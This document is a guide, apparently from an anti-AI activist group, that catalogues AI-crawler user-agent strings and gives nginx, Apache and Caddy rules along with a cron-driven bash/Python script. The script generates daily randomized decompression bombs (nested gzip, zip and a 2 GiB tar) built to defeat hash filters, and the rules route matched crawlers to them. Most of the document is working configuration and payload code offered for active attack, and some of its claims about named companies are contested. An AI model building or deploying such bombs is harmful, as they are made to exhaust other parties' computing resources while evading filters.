# Known Aggressive Bot User-Agents: A Living Reference for Content Creators
The Church of Malware (CoM) does not condone the use or introduction of agents onto any individual, human, or animal; however, AI is neither natural, a human, nor actual intelligence. This companion reference document provides a curated, scientifically grounded list of user-agent patterns documented as routinely violating `robots.txt`, using undeclared crawlers, or rotating identifiers. It is intended for individual website operators, photographers, filmmakers, musicians, and other creators who wish to implement conditional serving of active-denial techniques (decompression bombs, slowloris throttling, malformed content) described in the accompanying technique papers.
## 1 -- Scope and Methodology
The list is derived from public telemetry (Cloudflare Radar verified-bots), independent compliance studies (Originality.AI 2024-2025), incident reports (Wired Perplexity investigation, iFixit Anthropic logs, Read the Docs bandwidth data), and operator self-reports published through 2026. Only agents with repeated, multi-source evidence of policy violation are included. Compliant or inconsistently documented agents (e.g., most search-engine bots) are omitted or noted for monitoring only.
This document is updated quarterly. Individuals should cross-reference with their own server logs and the primary dissertation's Section 2.1 effectiveness tables before deployment.
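One way to cross-reference your own logs is to count requests per crawler token before deciding on any action. The sketch below assumes the nginx/Apache "combined" log format; the token list, the regular expression, and the function name `count_bot_hits` are illustrative assumptions rather than part of this reference.

```python
import re
from collections import Counter

# Combined Log Format: the user agent is the last double-quoted field.
# This pattern is an assumption about your log layout; adjust it if you
# use a custom log_format / LogFormat.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Illustrative subset of the tokens listed in Section 2.
TOKENS = ["GPTBot", "ClaudeBot", "Bytespider", "PerplexityBot", "Amazonbot"]


def count_bot_hits(lines, tokens=TOKENS):
    """Return a Counter of requests per token (case-insensitive substring match)."""
    hits = Counter()
    for line in lines:
        match = LINE_RE.match(line)
        if match is None:
            continue  # skip lines that are not in combined format
        ua = match.group("ua").lower()
        for token in tokens:
            if token.lower() in ua:
                hits[token] += 1
                break  # count each request once
    return hits


if __name__ == "__main__":
    import sys

    # Usage: python3 count_bots.py /var/log/nginx/access.log
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        for token, n in count_bot_hits(fh).most_common():
            print(f"{token}\t{n}")
```

Counting first gives a baseline, so a pattern is only acted on when it actually appears in your traffic.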
## 2 -- Curated List of Aggressive Agents
| User-Agent Pattern | Primary Operator | Documented Violations | Recommended Action for Individuals | Risk Level |
|----------------------------------------|-----------------------|------------------------------------------------------------|------------------------------------|------------|
| `GPTBot*` / `GPT-4*` / `OAI-SearchBot*` | OpenAI | Ignores robots.txt; undeclared AWS crawlers after explicit disallow | Block or serve bomb / tarpit | High |
| `ClaudeBot*` / `anthropic-ai*` | Anthropic | ~1M hits/24h on iFixit; five-figure monthly bandwidth abuse | Block or serve bomb / tarpit | High |
| `Bytespider*` / `ByteDance*` | ByteDance | Frequent robots.txt bypass; UA and IP rotation | Block or serve bomb / tarpit | High |
| `Perplexity*` / `PerplexityBot*` | Perplexity | Undeclared AWS IP range after robots.txt disallow | Block or serve bomb / tarpit | High |
| `Google-Extended*` | Google | Inconsistent honoring of opt-out signals for training data | Rate-limit or whitelist | Medium |
| `CCBot*` | Common Crawl | Old snapshots persist; no retroactive effect of new rules | Conditional / monitor | Low |
| `Amazonbot*` | Amazon | Aggressive crawling on small and personal sites | Rate-limit | Medium |
| `Applebot*` | Apple | Generally compliant but monitor for volume spikes | Monitor / whitelist | Low |
| `Meta-ExternalAgent*` / `facebook*` | Meta | Variable compliance on disallowed paths | Rate-limit | Medium |
| `*headless*` / generic Playwright/Puppeteer / `PhantomJS*` | Third-party scrapers & contractors | No declaration; high volume on tarpit and disallowed paths | Serve bomb / malformed immediately | High |
**Usage note**: Patterns are case-insensitive and support simple wildcards. Always combine with reverse-DNS verification for major operators and maintain an explicit allow-list for Internet Archive, academic researchers, and any search engines you wish to support.
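The usage note can be sketched in Python as follows. Two assumptions are made here: patterns are treated as substring matches (as the nginx `~*` regexes in Section 3 do), because real user-agent strings usually embed the bot token mid-string; and reverse-DNS verification is implemented as forward-confirmed reverse DNS. The function names and the `googlebot.com` suffix in the usage comment are illustrative; check each operator's published verification guidance for the correct host suffixes.

```python
import socket
from fnmatch import fnmatchcase

# Illustrative subset of the patterns in the table above.
PATTERNS = ["GPTBot*", "ClaudeBot*", "anthropic-ai*", "Bytespider*",
            "PerplexityBot*", "*headless*"]


def matches_aggressive(user_agent, patterns=PATTERNS):
    """Case-insensitive wildcard match, applied anywhere in the UA string."""
    ua = user_agent.lower()
    for pattern in patterns:
        core = pattern.strip("*").lower()
        if fnmatchcase(ua, f"*{core}*"):
            return True
    return False


def forward_confirmed_rdns(ip, allowed_suffixes,
                           reverse=socket.gethostbyaddr,
                           forward=socket.gethostbyname_ex):
    """Return True if ip reverse-resolves to an allowed host that resolves back to ip.

    The resolver functions are injectable so the logic can be tested offline.
    socket.gethostbyname_ex is IPv4-only; IPv6 would need socket.getaddrinfo.
    """
    try:
        hostname = reverse(ip)[0]
    except OSError:
        return False
    host = hostname.rstrip(".").lower()
    if not any(host == s or host.endswith("." + s) for s in allowed_suffixes):
        return False
    try:
        addresses = forward(host)[2]
    except OSError:
        return False
    return ip in addresses


# Example: only trust a claimed search-engine UA if DNS confirms it.
# forward_confirmed_rdns(client_ip, ["googlebot.com"])
```

A user-agent header is trivially spoofed, so the DNS check is what separates a verified allow-listed crawler from a scraper borrowing its name.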
## 3 -- Implementation Examples for Individuals
### 3.1 -- nginx map (recommended for self-hosted)
```nginx
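# Flag requests whose User-Agent contains a listed token (~* = case-insensitive regex)
map $http_user_agent $aggressive_bot {
    default 0;
    ~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless 1;
    ~*anthropic-ai|OAI-SearchBot 1;
}

server {
    location / {
        if ($aggressive_bot) {
            access_log /var/log/nginx/ai_violators.log;
            # serve bomb, slow response, or malformed content
            # (try_files is not permitted inside "if"; "break" avoids a rewrite loop)
            rewrite ^ /bomb.zip break;
        }
        # normal content
    }
}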
```
### 3.2 -- Apache (SetEnvIf + Rewrite, recommended for .htaccess or vhost)
```apache
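# Case-insensitive User-Agent match; sets aggressive_bot for conditional logging
SetEnvIfNoCase User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
RewriteEngine On
# Skip requests already under /protected/ so the rule cannot re-apply to its own target
RewriteCond %{REQUEST_URI} !^/protected/
RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
RewriteRule ^ /protected/bomb.zip [L]
# CustomLog is valid only in server or virtual-host context; omit it in .htaccess
CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot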
```
### 3.3 -- Cloudflare Worker (free tier)
Workers can inspect `request.headers.get('User-Agent')` and return a 200 with the bomb payload or a slow streaming response for matched agents while passing legitimate traffic.
### 3.4 -- Caddyfile
```
@aggressive_bot header_regexp User-Agent (?i)(GPTBot|ClaudeBot|Bytespider|headless)
handle @aggressive_bot {
	respond "Service Unavailable" 503
	# or rewrite to bomb endpoint
}
```
For complete, production-hardened configurations (full virtual-host examples, daily randomized bomb generation with cron automation, Apache support, logging, and verification steps), see the dedicated how-to document `howto-decompression-bombs.md`.
## 4 -- Daily Randomized Bomb Generation
To defeat static content-matching, hash-based allow-lists, and signature filters used by sophisticated ingestion pipelines, the generator must emit a fresh, high-entropy yet highly compressible payload every day.
```bash
#!/usr/bin/env bash
# save as ~/generate_daily_bombs.sh and chmod +x
# Recommended cron (run at 03:00 local):
# 0 3 * * * /home/youruser/generate_daily_bombs.sh >> /var/log/bombgen.log 2>&1
# The cron user needs write access to the log file and to /var/www/html/protected/.
set -e
DATE=$(date +%Y-%m-%d)
python3 - <<'PYEOF'
import gzip, tarfile, zipfile, io, secrets, datetime
from pathlib import Path

out = Path.home() / "bombs"
out.mkdir(exist_ok=True)
today = datetime.date.today().isoformat()

# High-entropy but compressible seed (repeating 4 KB random block)
block = secrets.token_bytes(4096)
# 1 MiB base with daily variation
base = (block * 256) + today.encode() + secrets.token_bytes(16)

# 1. Daily recursive gzip file (unique hash every run).
# Re-compressing adds layers, not size: fully unwrapped, this is still about 1 MiB.
data = base
for _ in range(9):
    data = gzip.compress(data)
(out / f"bomb-{today}.gz").write_bytes(data)

# 2. Nested zip with daily entropy (defeats hash caches).
# Holds about 1 GiB in memory while building.
with zipfile.ZipFile(out / f"bomb-{today}.zip", "w", zipfile.ZIP_DEFLATED) as z:
    inner = base * 1024
    for _ in range(7):
        inner = gzip.compress(inner)
    z.writestr(f"daily-{today}.gz", inner)

# 3. Tar archive with one large randomized member (parser stress + unique).
# Holds at least 2 GiB in memory while building.
with tarfile.open(out / f"bomb-{today}.tar.gz", "w:gz") as t:
    size = 2 * 1024 * 1024 * 1024
    info = tarfile.TarInfo(f"large-{today}.bin")
    info.size = size
    # compressible payload: a 64-byte pattern, random per run, repeated to exactly `size` bytes
    payload = secrets.token_bytes(64) * (size // 64)
    t.addfile(info, io.BytesIO(payload))

print(f"Daily randomized bombs generated for {today} in ~/bombs/")
PYEOF
# Point the stable names at today's files so the web server always serves the current payload
ln -sfn "$HOME/bombs/bomb-${DATE}.zip" /var/www/html/protected/bomb.zip
ln -sfn "$HOME/bombs/bomb-${DATE}.gz" /var/www/html/protected/bomb.gz
ln -sfn "$HOME/bombs/bomb-${DATE}.tar.gz" /var/www/html/protected/bomb.tar.gz
```
**Why randomization matters**: Static payloads allow labs to build bloom filters or exact-hash allow-lists after the first encounter. Daily unique, high-entropy yet recursively compressible files force re-analysis and re-processing every 24 hours, multiplying the economic cost of non-compliant crawling.
Place the generated files behind a `Disallow: /protected/` rule in `robots.txt`.
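Before deployment it is worth confirming that the `Disallow` rule really covers the path, so that compliant crawlers are never routed to it. The following is a minimal sketch using Python's standard `urllib.robotparser`; the sample `robots.txt` content and the helper name `is_disallowed` are assumptions for illustration.

```python
from urllib.robotparser import RobotFileParser

# Sample robots.txt content (assumed); substitute the text of your own file.
ROBOTS_TXT = """\
User-agent: *
Disallow: /protected/
"""


def is_disallowed(robots_txt, path, user_agent="*"):
    """Return True if robots_txt forbids user_agent from fetching path."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return not parser.can_fetch(user_agent, path)


if __name__ == "__main__":
    for path in ("/protected/bomb.zip", "/index.html"):
        print(path, "disallowed" if is_disallowed(ROBOTS_TXT, path) else "allowed")
```

Running the check against the deployed `robots.txt` after every edit guards against a typo that would leave the path open to well-behaved crawlers.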
## 5 -- Production Server Configurations
### 5.1 -- nginx (Complete Virtual Host Example)
```nginx
# /etc/nginx/sites-available/my-site
# Assumes this file is included from the http {} block (Debian/Ubuntu layout).
map $http_user_agent $aggressive_bot {
    default 0;
    ~*GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot 1;
}

# limit_req_zone is valid only at http level, so it is declared outside server {}
limit_req_zone $binary_remote_addr zone=ai_limit:10m rate=1r/s;

server {
    listen 80;
    server_name example.com;
    root /var/www/html;

    # Log aggressive traffic separately
    access_log /var/log/nginx/ai_violators.log combined if=$aggressive_bot;
    access_log /var/log/nginx/access.log combined;

    location / {
        # Optional: per-IP rate limit (applies to every client, not only bots)
        limit_req zone=ai_limit burst=5 nodelay;

        if ($aggressive_bot) {
            # Serve bomb or slow tarpit response
            rewrite ^ /protected/bomb.zip last;
        }
        try_files $uri $uri/ =404;
    }

    location /protected/ {
        internal;  # reachable only through internal redirects
        alias /var/www/html/protected/;
        add_header Content-Disposition "attachment; filename=\"archive.zip\"";
        limit_rate 1k;  # optional: throttle even further
    }
}
```
### 5.2 -- Apache Example
```apache
# /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
    ServerName example.com
    DocumentRoot /var/www/html

    # Case-insensitive User-Agent match; sets aggressive_bot=1
    SetEnvIfNoCase User-Agent "GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot" aggressive_bot
    CustomLog /var/log/apache2/ai_violators.log combined env=aggressive_bot
    CustomLog /var/log/apache2/access.log combined

    <Directory /var/www/html>
        Options -Indexes
        AllowOverride All
        Require all granted
    </Directory>

    RewriteEngine On
    # In virtual-host context the matched path starts with "/", hence ^/protected/
    RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
    RewriteRule ^/protected/ /protected/bomb.zip [L]
    RewriteCond %{HTTP_USER_AGENT} (GPTBot|ClaudeBot|Bytespider|Perplexity|headless|anthropic-ai|OAI-SearchBot) [NC]
    RewriteRule ^ - [E=aggressive_bot:1]

    # Requires mod_headers
    <Location /protected/>
        <If "%{ENV:aggressive_bot} == 1">
            Header set Content-Disposition "attachment; filename=\"archive.zip\""
        </If>
    </Location>
</VirtualHost>
```
## 6 -- Sources and Verification
| Section | Claim | Source |
|---------|-------|--------|
| 2 | GPTBot / Perplexity undeclared AWS activity | Wired, "Perplexity Is a Bullshit Machine," 19 Jun 2024; R. Knight blog, Jun 2024 |
| 2 | ClaudeBot volume on iFixit | K. Wiens (@kwiens) X post, 24 Jul 2024; 404 Media coverage |
| 2 | Read the Docs / Wikimedia crawler bandwidth abuse | E. Holscher, Read the Docs blog, 25 Jul 2024; Wikimedia Diff, 1 Apr 2025 |
| 2 | Bytespider / aggressive non-compliant bots | Cloudflare Radar verified-bots; Originality.AI "AI Bot Robots.txt Compliance Study," 2024 |
| 1, 4 | IETF / Common Crawl laundering context | Primary dissertation Sections 2.5 & 3.3; Mozilla 2024 Common Crawl study |
All listed agents have been independently corroborated by at least two public sources as of June 2026. Individuals are encouraged to contribute new observations.
## 7 -- Conclusion
This reference empowers individual creators to operationalize the economic and technical countermeasures outlined in the technique documents. By maintaining a single, authoritative, and regularly updated UA catalog, operators can rapidly adapt their defenses as crawler behavior evolves.
*Companion to "When Being Polite Fails, Try Poison" and the `techniques/` series. Review local laws and consult counsel before deploying active measures. Last updated: 3 June 2026.*